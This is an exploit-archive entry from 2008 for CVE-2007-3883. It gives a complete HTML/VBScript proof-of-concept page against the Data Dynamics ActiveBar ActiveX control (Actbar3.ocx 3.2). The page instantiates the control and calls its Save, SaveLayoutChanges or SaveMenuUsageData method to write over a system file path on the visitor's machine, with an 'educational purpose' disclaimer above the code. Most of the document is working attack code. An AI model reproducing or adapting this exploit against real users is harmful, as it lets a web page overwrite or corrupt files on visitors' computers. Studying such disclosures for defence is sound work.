Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods

Related Vulnerabilities: CVE-2007-3883  
Publish Date: 07 Apr 2008
Author: shinnai
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods</b>

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>

  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Exploit completed!")
   end if

 End Sub

# [2008-04-07]